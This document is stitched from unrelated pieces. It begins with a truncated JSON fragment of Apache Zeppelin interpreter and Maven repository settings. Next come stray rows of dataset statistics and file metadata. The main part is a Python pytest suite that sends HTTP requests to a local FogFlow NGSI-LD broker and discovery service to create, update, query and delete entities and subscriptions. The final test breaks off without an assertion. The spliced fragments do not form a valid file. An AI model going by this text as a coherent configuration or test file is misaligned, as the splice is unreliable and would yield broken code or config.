[\n {\n "editor": {\n "editOnDblClick": false, \n "language": "sql"\n }, \n "defaultInterpreter": false, \n "name": "sql", \n "class": "org.apache.zeppelin.jdbc.JDBCInterpreter"\n }\n ], \n "dependencies": [], \n "properties": {\n "common.max_count": "1000", \n "zeppelin.jdbc.keytab.location": "", \n "zeppelin.jdbc.concurrent.max_connection": "10", \n "default.user": "gpadmin", \n "zeppelin.jdbc.auth.type": "SIMPLE", \n "default.url": "jdbc:postgresql://localhost:5432/", \n "default.driver": "org.postgresql.Driver", \n "zeppelin.jdbc.concurrent.use": "true", \n "default.password": "", \n "zeppelin.jdbc.principal": ""\n }, \n "option": {\n "setPermission": false, \n "remote": true, \n "users": [], \n "isExistingProcess": false, \n "perUser": "shared", \n "isUserImpersonate": false, \n "perNote": "shared", \n "port": -1\n }\n }, \n "2CKEKWY8Z": {\n "status": "READY", \n "group": "angular", \n "name": "angular", \n "id": "2CKEKWY8Z", \n "interpreterGroup": [\n {\n "editor": {\n "editOnDblClick": true\n }, \n "defaultInterpreter": false, \n "name": "angular", \n "class": "org.apache.zeppelin.angular.AngularInterpreter"\n }\n ], \n "dependencies": [], \n "properties": {}, \n "option": {\n "setPermission": false, \n "remote": true, \n "users": [], \n "isExistingProcess": false, \n "perUser": "shared", \n "isUserImpersonate": false, \n "perNote": "shared", \n "port": -1\n }\n }, \n "2CKX6DGQZ": {\n "status": "READY", \n "group": "livy", \n "name": "livy", \n "id": "2CKX6DGQZ", \n "interpreterGroup": [\n {\n "editor": {\n "editOnDblClick": false, \n "language": "scala"\n }, \n "defaultInterpreter": true, \n "name": "spark", \n "class": "org.apache.zeppelin.livy.LivySparkInterpreter"\n }, \n {\n "editor": {\n "editOnDblClick": false, \n "language": "sql"\n }, \n "defaultInterpreter": false, \n "name": "sql", \n "class": "org.apache.zeppelin.livy.LivySparkSQLInterpreter"\n }, \n {\n "editor": {\n "editOnDblClick": false, \n "language": "python"\n }, \n "defaultInterpreter": false, \n "name": "pyspark", \n "class": "org.apache.zeppelin.livy.LivyPySparkInterpreter"\n }, \n {\n "editor": {\n "editOnDblClick": false, \n "language": "python"\n }, \n "defaultInterpreter": false, \n "name": "pyspark3", \n "class": "org.apache.zeppelin.livy.LivyPySpark3Interpreter"\n }, \n {\n "editor": {\n "editOnDblClick": false, \n "language": "r"\n }, \n "defaultInterpreter": false, \n "name": "sparkr", \n "class": "org.apache.zeppelin.livy.LivySparkRInterpreter"\n }\n ], \n "dependencies": [], \n "properties": {\n "livy.spark.dynamicAllocation.initialExecutors": "", \n "zeppelin.livy.keytab": "", \n "zeppelin.livy.spark.sql.maxResult": "1000", \n "livy.spark.executor.instances": "", \n "livy.spark.driver.memory": "", \n "livy.spark.executor.memory": "", \n "livy.spark.dynamicAllocation.enabled": "", \n "livy.spark.dynamicAllocation.cachedExecutorIdleTimeout": "", \n "livy.spark.driver.cores": "", \n "zeppelin.livy.session.create_timeout": "120", \n "zeppelin.livy.principal": "", \n "livy.spark.jars.packages": "", \n "livy.spark.dynamicAllocation.maxExecutors": "", \n "zeppelin.livy.concurrentSQL": "false", \n "zeppelin.livy.displayAppInfo": "false", \n "livy.spark.dynamicAllocation.minExecutors": "", \n "zeppelin.livy.url": "http://localhost:8998", \n "zeppelin.livy.spark.sql.field.truncate": "true", \n "zeppelin.livy.pull_status.interval.millis": "1000", \n "livy.spark.executor.cores": ""\n }, \n "option": {\n "setPermission": false, \n "remote": true, \n "users": [], \n "isExistingProcess": false, \n "perUser": 
"scoped", \n "isUserImpersonate": false, \n "perNote": "shared", \n "port": -1\n }\n }\n }, \n "interpreterBindings": {}, \n "interpreterRepositories": [\n {\n "releasePolicy": {\n "checksumPolicy": "warn", \n "enabled": true, \n "updatePolicy": "daily"\n }, \n "mirroredRepositories": [], \n "snapshotPolicy": {\n "checksumPolicy": "warn", \n "enabled": true, \n "updatePolicy": "daily"\n }, \n "url": "http://repo1.maven.org/maven2/", \n "repositoryManager": false, \n "type": "default", \n "id": "central"\n }, \n {\n "releasePolicy": {\n "checksumPolicy": "warn", \n "enabled": true, \n "updatePolicy": "daily"\n }, \n "mirroredRepositories": [], \n "snapshotPolicy": {\n "checksumPolicy": "warn", \n "enabled": true, \n "updatePolicy": "daily"\n }, \n "url": "file:///home/zeppelin/.m2/repository", \n "repositoryManager": false, \n "type": "default", \n "id": "local"\n }\n ]\n}'
| 1,638.407407
| 15,625
| 0.503086
| 4,436
| 44,237
| 5.010144
| 0.058611
| 0.028796
| 0.016198
| 0.04252
| 0.941417
| 0.932193
| 0.915006
| 0.900427
| 0.870281
| 0.837885
| 0
| 0.012766
| 0.30054
| 44,237
| 27
| 15,626
| 1,638.407407
| 0.705514
| 0.017474
| 0
| 0
| 0
| 2
| 0.996019
| 0.250736
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 1
| 1
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
|
0
| 13
|
5d1f292aebcc1d9924a7325053e7b1d32b8a90fc
| 50,190
|
py
|
Python
|
test/UnitTest/NGSI-LD/test_casesNGSI-LD.py
|
jason-fox/fogflow
|
e396ef0dee0125936954e381ab2862fd472e1774
|
[
"BSD-3-Clause"
] | null | null | null |
test/UnitTest/NGSI-LD/test_casesNGSI-LD.py
|
jason-fox/fogflow
|
e396ef0dee0125936954e381ab2862fd472e1774
|
[
"BSD-3-Clause"
] | null | null | null |
test/UnitTest/NGSI-LD/test_casesNGSI-LD.py
|
jason-fox/fogflow
|
e396ef0dee0125936954e381ab2862fd472e1774
|
[
"BSD-3-Clause"
] | null | null | null |
import os,sys
# change the path according to the location of the test folder on the system
from datetime import datetime
import copy
import json
import requests
import time
import pytest
import ld_data
# change these to the broker ip and port
brokerIp="http://localhost:8070"
discoveryIp="http://localhost:8090"
print("Testing of NGSI-LD")
# testCase 1
'''
To test creating an entity with context in the Link header
'''
def test_case1():
    url=brokerIp+"/ngsi-ld/v1/entities/"
    headers={'Content-Type' : 'application/json','Accept':'application/ld+json','Link':'<{{link}}>; rel="https://uri.etsi.org/ngsi-ld/v1/ngsi-ld-core-context.jsonld"; type="application/ld+json"'}
    r=requests.post(url,data=json.dumps(ld_data.subdata1),headers=headers)
    print(r.content)
    print(r.status_code)
    assert r.status_code == 201

#testCase 2
'''
To test creating an entity with context in the payload
'''
def test_case2():
    url=brokerIp+"/ngsi-ld/v1/entities/"
    headers={'Content-Type' : 'application/json','Accept':'application/ld+json'}
    r=requests.post(url,data=json.dumps(ld_data.subdata2),headers=headers)
    print(r.content)
    print(r.status_code)
    assert r.status_code == 201

#testCase 3
'''
To test creating an entity with context in the Link header when the request payload is already expanded
'''
def test_case3():
    url=brokerIp+"/ngsi-ld/v1/entities/"
    headers={'Content-Type' : 'application/json','Accept':'application/ld+json'}
    r=requests.post(url,data=json.dumps(ld_data.subdata3),headers=headers)
    print(r.content)
    print(r.status_code)
    assert r.status_code == 201

#testCase 4
'''
To test appending additional attributes to an existing entity
'''
def test_case4():
    url=brokerIp+"/ngsi-ld/v1/entities/"
    headers={'Content-Type' : 'application/json', 'Accept':'application/ld+json'}
    r=requests.post(url,data=json.dumps(ld_data.subdata4),headers=headers)
    print(r.content)
    print(r.status_code)
    assert r.status_code == 201

#testCase 5
'''
To test updating specific attributes of an existing entity A100
'''
def test_case5():
    url=brokerIp+"/ngsi-ld/v1/entities/"
    headers={'Content-Type' : 'application/json','Accept':'application/ld+json'}
    r=requests.post(url,data=json.dumps(ld_data.subdata5),headers=headers)
    print(r.status_code)
    assert r.status_code == 201

#testCase 6
'''
To test updating the value of a specific attribute of an existing entity with a wrong payload
'''
def test_case6():
    url=brokerIp+"/ngsi-ld/v1/entities/"
    headers={'Content-Type' : 'application/json'}
    r=requests.post(url,data=json.dumps(ld_data.subdata6),headers=headers)
    print(r.content)
    print(r.status_code)
    assert r.status_code == 400
#testCase 7
'''
To test creating an entity without passing any headers
'''
def test_case7():
    url=brokerIp+"/ngsi-ld/v1/entities/"
    r=requests.post(url,data=json.dumps(ld_data.subdata13))
    print(r.content)
    print(r.status_code)
    assert r.status_code == 400

#testCase 8
'''
To test creating an entity without passing the Link header
'''
def test_case8():
    url=brokerIp+"/ngsi-ld/v1/entities/"
    headers={'Content-Type' : 'application/json','Accept':'application/ld+json'}
    r=requests.post(url,data=json.dumps(ld_data.subdata),headers=headers)
    print(r.content)
    print(r.status_code)
    assert r.status_code == 201

#testCase 9
'''
To test updating an entity with two headers, namely Content-Type and Accept, while posting a duplicate attribute
'''
def test_case9():
    url=brokerIp+"/ngsi-ld/v1/entities/"
    headers={'Content-Type' : 'application/json','Accept':'application/ld+json'}
    r=requests.post(url,data=json.dumps(ld_data.subdata14),headers=headers)
    print(r.content)
    print(r.status_code)
    assert r.status_code == 201

#testCase 10
'''
To test updating an entity with a wrong id format
'''
def test_case10():
    url=brokerIp+"/ngsi-ld/v1/entities/"
    headers={'Content-Type' : 'application/json','Accept':'application/ld+json'}
    r=requests.post(url,data=json.dumps(ld_data.subdata14b),headers=headers)
    print(r.content)
    print(r.status_code)
    assert r.status_code == 400

#testCase 11
'''
To test updating an entity with a wrong id format and without passing the Accept header
'''
def test_case11():
    url=brokerIp+"/ngsi-ld/v1/entities/"
    headers={'Content-Type' : 'application/json'}
    r=requests.post(url,data=json.dumps(ld_data.subdata14b),headers=headers)
    print(r.content)
    print(r.status_code)
    assert r.status_code == 400

#testCase 12
'''
To test updating an entity with three headers, namely Content-Type, Accept and the context Link
'''
def test_case12():
    url=brokerIp+"/ngsi-ld/v1/entities/"
    headers={'Content-Type' : 'application/json','Accept':'application/ld+json','Link':'<{{link}}>; rel="https://uri.etsi.org/ngsi-ld/v1/ngsi-ld-core-context.jsonld"; type="application/ld+json"'}
    r=requests.post(url,data=json.dumps(ld_data.subdata14),headers=headers)
    print(r.content)
    print(r.status_code)
    assert r.status_code == 201
#testCase 13
'''
To test updating an entity with the Content-Type, Accept and context Link headers while passing an inappropriate payload
'''
def test_case13():
    url=brokerIp+"/ngsi-ld/v1/entities/"
    headers={'Content-Type' : 'application/json','Accept':'application/ld+json','Link':'<{{link}}>; rel="https://uri.etsi.org/ngsi-ld/v1/ngsi-ld-core-context.jsonld"; type="application/ld+json"'}
    r=requests.post(url,data=json.dumps(ld_data.subdata15),headers=headers)
    print(r.content)
    print(r.status_code)
    assert r.status_code == 500

#testCase 14
'''
To test updating an entity without headers
'''
def test_case14():
    url=brokerIp+"/ngsi-ld/v1/entities/"
    r=requests.post(url,data=json.dumps(ld_data.subdata14))
    print(r.content)
    print(r.status_code)
    assert r.status_code == 400

#testCase 15
'''
To test updating an entity by first creating the entity without the corresponding attribute
'''
def test_case15():
    #create NGSI-LD entity
    url=brokerIp+"/ngsi-ld/v1/entities/"
    headers={'Content-Type' : 'application/json','Accept':'application/ld+json','Link':'<{{link}}>; rel="https://uri.etsi.org/ngsi-ld/v1/ngsi-ld-core-context.jsonld"; type="application/ld+json"'}
    r=requests.post(url,data=json.dumps(ld_data.subdata16),headers=headers)
    print(r.content)
    print(r.status_code)
    #update the corresponding entity using post
    url=brokerIp+"/ngsi-ld/v1/entities/"
    headers={'Content-Type' : 'application/json','Accept':'application/ld+json','Link':'<{{link}}>; rel="https://uri.etsi.org/ngsi-ld/v1/ngsi-ld-core-context.jsonld"; type="application/ld+json"'}
    r=requests.post(url,data=json.dumps(ld_data.subdata14c),headers=headers)
    print(r.content)
    print(r.status_code)
    assert r.status_code == 201

#testCase 16
'''
To test updating an entity by first creating the entity with all attributes missing
'''
def test_case16():
    #create NGSI-LD entity
    url=brokerIp+"/ngsi-ld/v1/entities/"
    headers={'Content-Type' : 'application/json','Accept':'application/ld+json','Link':'<{{link}}>; rel="https://uri.etsi.org/ngsi-ld/v1/ngsi-ld-core-context.jsonld"; type="application/ld+json"'}
    r=requests.post(url,data=json.dumps(ld_data.subdata17),headers=headers)
    #print(r.content)
    #print(r.status_code)
    #update the corresponding entity using post
    url=brokerIp+"/ngsi-ld/v1/entities/"
    headers={'Content-Type' : 'application/json','Accept':'application/ld+json','Link':'<{{link}}>; rel="https://uri.etsi.org/ngsi-ld/v1/ngsi-ld-core-context.jsonld"; type="application/ld+json"'}
    r=requests.post(url,data=json.dumps(ld_data.subdata14d),headers=headers)
    #print(r.content)
    #print(r.status_code)
    assert r.status_code == 201
#testCase 17
'''
To test deleting an NGSI-LD context entity
'''
def test_17():
    #create NGSI-LD entity
    url=brokerIp+"/ngsi-ld/v1/entities/"
    headers={'Content-Type' : 'application/json','Accept':'application/ld+json','Link':'<{{link}}>; rel="https://uri.etsi.org/ngsi-ld/v1/ngsi-ld-core-context.jsonld"; type="application/ld+json"'}
    r=requests.post(url,data=json.dumps(ld_data.subdata32),headers=headers)
    #print(r.content)
    #print(r.status_code)
    #to delete the corresponding entity
    url=brokerIp+"/ngsi-ld/v1/entities/urn:ngsi-ld:Vehicle:A999"
    headers={'Content-Type':'application/json','Accept':'application/ld+json'}
    r=requests.delete(url,headers=headers)
    #print(r.status_code)
    assert r.status_code == 204

#testCase 18
'''
To test deleting an attribute of an NGSI-LD context entity
'''
def test_case18():
    #create NGSI-LD entity
    url=brokerIp+"/ngsi-ld/v1/entities/"
    headers={'Content-Type' : 'application/json','Accept':'application/ld+json','Link':'<{{link}}>; rel="https://uri.etsi.org/ngsi-ld/v1/ngsi-ld-core-context.jsonld"; type="application/ld+json"'}
    r=requests.post(url,data=json.dumps(ld_data.subdata11),headers=headers)
    print(r.content)
    #print(r.status_code)
    #to append the attribute of the corresponding entity
    url=brokerIp+"/ngsi-ld/v1/entities/"
    headers={'Content-Type' : 'application/json','Accept':'application/ld+json'}
    r=requests.post(url,data=json.dumps(ld_data.subdata4b),headers=headers)
    print(r.content)
    #print(r.status_code)
    #to delete the attribute of the corresponding entity
    url=brokerIp+"/ngsi-ld/v1/entities/urn:ngsi-ld:Vehicle:A500/attrs/brandName1"
    r=requests.delete(url)
    #print(r.status_code)
    assert r.status_code == 204

#testCase 19
'''
To test deleting an attribute of an NGSI-LD context entity which does not have that attribute
'''
def test_case19():
    #create NGSI-LD entity
    url=brokerIp+"/ngsi-ld/v1/entities/"
    headers={'Content-Type' : 'application/json','Accept':'application/ld+json','Link':'<{{link}}>; rel="https://uri.etsi.org/ngsi-ld/v1/ngsi-ld-core-context.jsonld"; type="application/ld+json"'}
    r=requests.post(url,data=json.dumps(ld_data.subdata18),headers=headers)
    #print(r.content)
    #print(r.status_code)
    #to delete an attribute of the corresponding entity
    url=brokerIp+"/ngsi-ld/v1/entities/urn:ngsi-ld:Vehicle:A501/attrs/brandName1"
    r=requests.delete(url)
    print(r.content)
    #print(r.status_code)
    assert r.status_code == 404
#testCase 20
'''
To test retrieving a specific entity which has been deleted
'''
def test_case20():
    url=brokerIp+"/ngsi-ld/v1/entities/urn:ngsi-ld:Vehicle:A999"
    headers={'Content-Type' : 'application/ld+json','Accept':'application/ld+json'}
    r=requests.get(url,headers=headers)
    #print(r.content)
    #print(r.status_code)
    assert r.status_code == 404

#testCase 21
'''
To test retrieving a specific entity which exists
'''
def test_case21():
    url=brokerIp+"/ngsi-ld/v1/entities/urn:ngsi-ld:Vehicle:A4580"
    headers={'Content-Type' : 'application/ld+json','Accept':'application/ld+json'}
    r=requests.get(url,headers=headers)
    resp_content=r.content
    resInJson= resp_content.decode('utf8').replace("'", '"')
    resp=json.loads(resInJson)
    #print(resp)
    if resp["id"]=="urn:ngsi-ld:Vehicle:A4580":
        print("\nValidated")
    else:
        print("\nNot Validated")
    #print(r.status_code)
    assert r.status_code == 200

#testCase 22
'''
To test retrieving entities by attributes
'''
def test_case22():
    url=brokerIp+"/ngsi-ld/v1/entities?attrs=http://example.org/vehicle/brandName"
    headers={'Content-Type':'application/json','Accept':'application/ld+json'}
    r=requests.get(url,headers=headers)
    resp_content=r.content
    resInJson= resp_content.decode('utf8').replace("'", '"')
    resp=json.loads(resInJson)
    #print(resp)
    if resp[0]["http://example.org/vehicle/brandName"]["value"]=="Mercedes":
        print("\nValidated")
    else:
        print("\nNot Validated")
    #print(r.status_code)
    assert r.status_code == 200

#testCase 23
'''
To test retrieving entities by attributes with a wrong query
'''
def test_case23():
    url=brokerIp+"/ngsi-ld/v1/entities?attrs"
    headers={'Content-Type':'application/json','Accept':'application/ld+json'}
    r=requests.get(url,headers=headers)
    #print(r.content)
    #print(r.status_code)
    assert r.status_code == 400
#testCase 24
'''
To test to retrieve a specific entity by ID and Type
'''
def test_case24():
url=brokerIp+"/ngsi-ld/v1/entities?id=urn:ngsi-ld:Vehicle:A4580&type=http://example.org/vehicle/Vehicle"
headers={'Content-Type' : 'application/json','Accept':'application/ld+json'}
r=requests.get(url,headers=headers)
resp_content=r.content
resInJson= resp_content.decode('utf8').replace("'", '"')
resp=json.loads(resInJson)
#print(resp)
if resp[0]["type"]=="http://example.org/vehicle/Vehicle" and resp[0]["id"]=="urn:ngsi-ld:Vehicle:A4580":
print("\nValidated")
else:
print("\nNot Validated")
#print(r.status_code)
assert r.status_code == 200
#testCase 25
'''
To test to retrieve a specific entity by Type
'''
def test_case25():
url=brokerIp+"/ngsi-ld/v1/entities?type=http://example.org/vehicle/Vehicle"
headers={'Content-Type' : 'application/json','Accept':'application/ld+json'}
r=requests.get(url,headers=headers)
resp_content=r.content
resInJson= resp_content.decode('utf8').replace("'", '"')
resp=json.loads(resInJson)
#print(resp)
if resp[0]["type"]=="http://example.org/vehicle/Vehicle":
print("\nValidated")
else:
print("\nNot Validated")
#print(r.status_code)
assert r.status_code == 200
#testCase 26
'''
To test to retrieve a specific entity by Type with wrong query
'''
def test_case26():
url=brokerIp+"/ngsi-ld/v1/entities?type=http://example.org"
headers={'Content-Type' : 'application/json','Accept':'application/ld+json'}
r=requests.get(url,headers=headers)
#print(r.content)
#print(r.status_code)
assert r.status_code == 404
#testCase 27
'''
To test to retrieve entities by Type, with context in Link Header
'''
def test_case27():
url=brokerIp+"/ngsi-ld/v1/entities?type=Vehicle"
headers={'Content-Type' : 'application/json','Accept':'application/ld+json','Link':'<{{link}}>; rel="https://uri.etsi.org/ngsi-ld/v1/ngsi-ld-core-context.jsonld"; type="application/ld+json"'}
r=requests.get(url,headers=headers)
resp_content=r.content
resInJson= resp_content.decode('utf8').replace("'", '"')
resp=json.loads(resInJson)
#print(resp)
if resp[0]["type"]=="Vehicle":
print("\nValidated")
else:
print("\nNot Validated")
#print(r.status_code)
assert r.status_code == 200
#testCase 28
'''
To test to retrieve a specific entity by Type, context in Link Header and wrong query
'''
def test_case28():
url=brokerIp+"/ngsi-ld/v1/entities?type"
headers={'Content-Type' : 'application/json','Accept':'application/ld+json','Link':'<{{link}}>; rel="https://uri.etsi.org/ngsi-ld/v1/ngsi-ld-core-context.jsonld"; type="application/ld+json"'}
r=requests.get(url,headers=headers)
#print(r.content)
#print(r.status_code)
assert r.status_code == 400
#testCase 29
'''
To test to retrieve a specific entity by IdPattern and Type
'''
def test_case29():
url=brokerIp+"/ngsi-ld/v1/entities?idPattern=urn:ngsi-ld:Vehicle:A.*&type=http://example.org/vehicle/Vehicle"
headers={'Content-Type' : 'application/json','Accept':'application/ld+json'}
r=requests.get(url,headers=headers)
resp_content=r.content
resInJson= resp_content.decode('utf8').replace("'", '"')
resp=json.loads(resInJson)
#print(resp)
if resp[0]["type"]=="http://example.org/vehicle/Vehicle" and resp[0]["id"].find("A")!=-1:
print("\nValidated")
else:
print("\nNot Validated")
#print(r.status_code)
assert r.status_code == 200
#testCase 30
'''
To test to retrieve an entity registered over Discovery
'''
def test_case30():
url=discoveryIp+"/ngsi9/registration/urn:ngsi-ld:Vehicle:A4580"
r=requests.get(url)
resp_content=r.content
resInJson= resp_content.decode('utf8').replace("'", '"')
resp=json.loads(resInJson)
#print(resp)
if resp["ID"]=="urn:ngsi-ld:Vehicle:A4580":
print("\nValidated")
else:
print("\nNot Validated")
#print(r.status_code)
assert r.status_code == 200
#testCase 31
'''
To test to create a new Subscription with context in Link header
'''
def test_case31():
#create subscription
url=brokerIp+"/ngsi-ld/v1/subscriptions/"
headers={'Content-Type' : 'application/ld+json','Link':'<{{link}}>; rel="https://uri.etsi.org/ngsi-ld/v1/ngsi-ld-core-context.jsonld"; type="application/ld+json"'}
r=requests.post(url,data=json.dumps(ld_data.subdata10),headers=headers)
#print(r.content)
#print(r.status_code)
assert r.status_code == 201
#testCase 32
'''
To test to retrieve all the subscriptions
'''
def test_case32():
url=brokerIp+"/ngsi-ld/v1/subscriptions/"
headers={'Accept' : 'application/ld+json'}
r=requests.get(url,headers=headers)
#print(r.content)
#print(r.status_code)
assert r.status_code == 200
#testCase 33
'''
To test to retrieve a specific subscription based on subscription id
'''
def test_case33():
url=brokerIp+"/ngsi-ld/v1/subscriptions/urn:ngsi-ld:Subscription:7"
headers={'Accept':'application/ld+json'}
r=requests.get(url,headers=headers)
resp_content=r.content
resInJson= resp_content.decode('utf8').replace("'", '"')
resp=json.loads(resInJson)
#print(resp)
if resp["id"]=="urn:ngsi-ld:Subscription:7":
print("\nValidated")
else:
print("\nNot Validated")
#print(r.status_code)
assert r.status_code == 200
#testCase 34
'''
To test to update a specific subscription based on subscription id, with context in Link header
'''
def test_case34():
#get subscription before update
url=brokerIp+"/ngsi-ld/v1/subscriptions/urn:ngsi-ld:Subscription:7"
headers={'Accept':'application/ld+json'}
r=requests.get(url,headers=headers)
#print(r.content)
#print(r.status_code)
#Update the subscription
url=brokerIp+"/ngsi-ld/v1/subscriptions/urn:ngsi-ld:Subscription:7"
headers={'Content-Type':'application/ld+json','Link':'<{{link}}>; rel="https://uri.etsi.org/ngsi-ld/v1/ngsi-ld-core-context.jsonld"; type="application/ld+json"'}
r=requests.patch(url,data=json.dumps(ld_data.subdata12),headers=headers)
#print(r.content)
#print(r.status_code)
#get subscription after update
url=brokerIp+"/ngsi-ld/v1/subscriptions/urn:ngsi-ld:Subscription:7"
headers={'Accept':'application/ld+json'}
r=requests.get(url,headers=headers)
resp_content=r.content
resInJson= resp_content.decode('utf8').replace("'", '"')
resp=json.loads(resInJson)
#print(resp)
if resp["id"]=="urn:ngsi-ld:Subscription:7":
print("\nValidated")
else:
print("\nNot Validated")
#print(r.status_code)
assert r.status_code == 200
#testCase 35
'''
To test to update a specific subscription based on subscription id, without headers
'''
def test_case35():
url=brokerIp+"/ngsi-ld/v1/subscriptions/urn:ngsi-ld:Subscription:7"
r=requests.patch(url,data=json.dumps(ld_data.subdata12))
#print(r.content)
#print(r.status_code)
assert r.status_code == 400
#testCase 36
'''
To test to update a specific subscription based on subscription id, with context in Link header and different payload
'''
def test_case36():
url=brokerIp+"/ngsi-ld/v1/subscriptions/urn:ngsi-ld:Subscription:7"
headers={'Content-Type':'application/ld+json','Link':'<{{link}}>; rel="https://uri.etsi.org/ngsi-ld/v1/ngsi-ld-core-context.jsonld"; type="application/ld+json"'}
r=requests.patch(url,data=json.dumps(ld_data.subdata20),headers=headers)
#print(r.content)
#print(r.status_code)
assert r.status_code == 204
#testCase 37
'''
To test to delete a specific subscription based on subscription id
'''
def test_case37():
url=brokerIp+"/ngsi-ld/v1/subscriptions/urn:ngsi-ld:Subscription:7"
r=requests.delete(url)
#print(r.status_code)
assert r.status_code == 204
#testCase 38
'''
To test for empty payload in entity creation
'''
def test_case38():
url=brokerIp+"/ngsi-ld/v1/entities/"
headers={'Content-Type' : 'application/json','Accept':'application/ld+json','Link':'<{{link}}>; rel="https://uri.etsi.org/ngsi-ld/v1/ngsi-ld-core-context.jsonld"; type="application/ld+json"'}
r=requests.post(url,data=json.dumps(ld_data.subdata26),headers=headers)
#print(r.content)
#print(r.status_code)
assert r.status_code == 400
#testCase 39
'''
To test for empty payload in subscription
'''
def test_case39():
url=brokerIp+"/ngsi-ld/v1/subscriptions/"
headers={'Content-Type' : 'application/ld+json','Link':'<{{link}}>; rel="https://uri.etsi.org/ngsi-ld/v1/ngsi-ld-core-context.jsonld"; type="application/ld+json"'}
r=requests.post(url,data=json.dumps(ld_data.subdata26),headers=headers)
#print(r.content)
#print(r.status_code)
assert r.status_code == 400
#testCase 40
'''
To test for ModifiedAt and CreatedAt in entity creation
'''
def test_case40():
#Entity Creation
url=brokerIp+"/ngsi-ld/v1/entities/"
headers={'Content-Type' : 'application/json','Accept':'application/ld+json','Link':'<{{link}}>; rel="https://uri.etsi.org/ngsi-ld/v1/ngsi-ld-core-context.jsonld"; type="application/ld+json"'}
r=requests.post(url,data=json.dumps(ld_data.subdata27),headers=headers)
#print(r.content)
#print(r.status_code)
#Fetching Entity
url=brokerIp+"/ngsi-ld/v1/entities/urn:ngsi-ld:Vehicle:A6000"
headers={'Content-Type' : 'application/ld+json','Accept':'application/ld+json'}
r=requests.get(url,headers=headers)
resp_content=r.content
resInJson= resp_content.decode('utf8').replace("'", '"')
resp=json.loads(resInJson)
#print(resp)
if resp["id"]=="urn:ngsi-ld:Vehicle:A6000":
print("\nValidated")
else:
print("\nNot Validated")
#print(r.status_code)
assert r.status_code == 200
#testCase 41
'''
To test for ModifiedAt and CreatedAt in subscription
'''
def test_case41():
#create subscription
url=brokerIp+"/ngsi-ld/v1/subscriptions/"
headers={'Content-Type' : 'application/ld+json','Link':'<{{link}}>; rel="https://uri.etsi.org/ngsi-ld/v1/ngsi-ld-core-context.jsonld"; type="application/ld+json"'}
r=requests.post(url,data=json.dumps(ld_data.subdata29),headers=headers)
#print(r.content)
#print(r.status_code)
#making a get request
url=brokerIp+"/ngsi-ld/v1/subscriptions/urn:ngsi-ld:Subscription:8"
headers={'Accept':'application/ld+json'}
r=requests.get(url,headers=headers)
resp_content=r.content
resInJson= resp_content.decode('utf8').replace("'", '"')
resp=json.loads(resInJson)
#print(resp)
if resp["id"]=="urn:ngsi-ld:Subscription:8":
print("\nValidated")
else:
print("\nNot Validated")
#print(r.status_code)
assert r.status_code == 200
#testCase 42
'''
To test subscription update over discovery
'''
def test_case42():
#create a subscription
url=brokerIp+"/ngsi-ld/v1/subscriptions/"
headers={'Content-Type' : 'application/ld+json','Link':'<{{link}}>; rel="https://uri.etsi.org/ngsi-ld/v1/ngsi-ld-core-context.jsonld"; type="application/ld+json"'}
r=requests.post(url,data=json.dumps(ld_data.subdata30),headers=headers)
#print(r.content)
#print(r.status_code)
#get subscription over discovery before update
url=discoveryIp+"/ngsi9/subscription"
r=requests.get(url)
#print(r.content)
#print(r.status_code)
#update the subscription
url=brokerIp+"/ngsi-ld/v1/subscriptions/urn:ngsi-ld:Subscription:10"
headers={'Content-Type':'application/ld+json','Link':'<{{link}}>; rel="https://uri.etsi.org/ngsi-ld/v1/ngsi-ld-core-context.jsonld"; type="application/ld+json"'}
r=requests.patch(url,data=json.dumps(ld_data.subdata31),headers=headers)
#print(r.content)
#print(r.status_code)
#get subscription after update
url=discoveryIp+"/ngsi9/subscription"
r=requests.get(url)
#print(r.content)
#print(r.status_code)
assert r.status_code == 200
#testCase 43
'''
To test entity creation with nested property with context in payload
'''
def test_case43():
url=brokerIp+"/ngsi-ld/v1/entities/"
headers={'Content-Type' : 'application/json','Accept':'application/ld+json'}
r=requests.post(url,data=json.dumps(ld_data.subdata33),headers=headers)
#print(r.content)
#print(r.status_code)
assert r.status_code == 201
#testCase 44
'''
To test create entity with nested property with context in Link
'''
def test_case44():
url=brokerIp+"/ngsi-ld/v1/entities/"
headers={'Content-Type' : 'application/json','Accept':'application/ld+json','Link':'<{{link}}>; rel="https://uri.etsi.org/ngsi-ld/v1/ngsi-ld-core-context.jsonld"; type="application/ld+json"'}
r=requests.post(url,data=json.dumps(ld_data.subdata34),headers=headers)
print(r.content)
print(r.status_code)
assert r.status_code == 201
#testCase 45
'''
To test to retrieve entity with id as urn:ngsi-ld:Vehicle:B990
'''
def test_case45():
url=brokerIp+"/ngsi-ld/v1/entities/urn:ngsi-ld:Vehicle:B990"
headers={'Content-Type' : 'application/ld+json','Accept':'application/ld+json'}
r=requests.get(url,headers=headers)
#print(r.content)
resp_content=r.content
resInJson= resp_content.decode('utf8').replace("'", '"')
resp=json.loads(resInJson)
#print(resp)
if resp["id"]=="urn:ngsi-ld:Vehicle:B990":
print("\nValidated")
else:
print("\nNot Validated")
print(r.status_code)
assert r.status_code == 200
#testCase 46
'''
To test retrieval of the entity from discovery
'''
def test_case46():
url=discoveryIp+"/ngsi9/registration/urn:ngsi-ld:Vehicle:C001"
r=requests.get(url)
resp_content=r.content
resInJson= resp_content.decode('utf8').replace("'", '"')
resp=json.loads(resInJson)
#print(resp)
if resp["ID"]=="urn:ngsi-ld:Vehicle:C001":
print("\nValidated")
else:
print("\nNot Validated")
#print(r.status_code)
assert r.status_code == 200
#testCase 47
'''
To test if multiple subscriptions can be created with the same subscription Id
'''
def test_case47():
url=brokerIp+"/ngsi-ld/v1/subscriptions/"
headers={'Content-Type' : 'application/ld+json','Link':'<{{link}}>; rel="https://uri.etsi.org/ngsi-ld/v1/ngsi-ld-core-context.jsonld"; type="application/ld+json"'}
r=requests.post(url,data=json.dumps(ld_data.subdata36),headers=headers)
#print(r.content)
#print(r.status_code)
#get subscription over discovery before update
url=discoveryIp+"/ngsi9/subscription"
r=requests.get(url)
#print(r.content)
#print(r.status_code)
#to create same subscription again
url=brokerIp+"/ngsi-ld/v1/subscriptions/"
headers={'Content-Type' : 'application/ld+json','Link':'<{{link}}>; rel="https://uri.etsi.org/ngsi-ld/v1/ngsi-ld-core-context.jsonld"; type="application/ld+json"'}
r=requests.post(url,data=json.dumps(ld_data.subdata36),headers=headers)
print(r.content)
